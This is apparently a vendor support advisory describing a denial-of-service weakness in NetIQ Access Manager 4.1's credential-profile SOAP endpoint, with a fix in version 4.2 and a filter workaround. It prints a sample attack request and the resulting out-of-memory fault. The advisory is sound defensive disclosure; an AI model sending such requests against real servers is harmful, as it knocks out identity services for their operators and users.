DoS attack against Identity Server possible via open /nidp/service/ interface

  • 7016986
  • 13-Nov-2015
  • 02-Dec-2015

Environment

NetIQ Access Manager 4.1

Situation

The following URL on the Identity Server "/nidp/service/IDSISCredentialProfile?wsdl" is open for everyone to discover. This file simply describes the web service interface that is used by the IDP/AGs for updating credential profile info. Although very few people use this outside of the Access Gateway, it is possible to upload a large file to this interface, and causes a stack dump. Repeating the exercise 1000s of time could generate

POST /nidp/services/IDSISCredentialProfile HTTP/1.1
Host: federation.novell.com
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
[...]
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:urn="urn:novell:credentialprofile:2005-03">
<soapenv:Header/>
<soapenv:Body>
<urn:Queryxsi:type="xsd:anyType"><E>x</E></urn:Query>
</soapenv:Body>
</soapenv:Envelope>

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
[...]
<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchemainstance"><
soapenv:Body><soapenv:Fault><faultcode>soapenv:Server.generalException</fault
code><faultstring>java.lang.OutOfMemoryError: Java heap space; nested exception is:
java.lang.OutOfMemoryError: Java heap space</faultstring><detail><ns1:hostname
xmlns:ns1="http://xml.apache.org/axis/">neilidp4.lab.novell.com</ns1:hostname></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>

Resolution

Fixed in NAM 4.2.

On 4.1, could use a tomcat filter to detect the above URL and if not from a recognised host, drop the request or redirect to another page.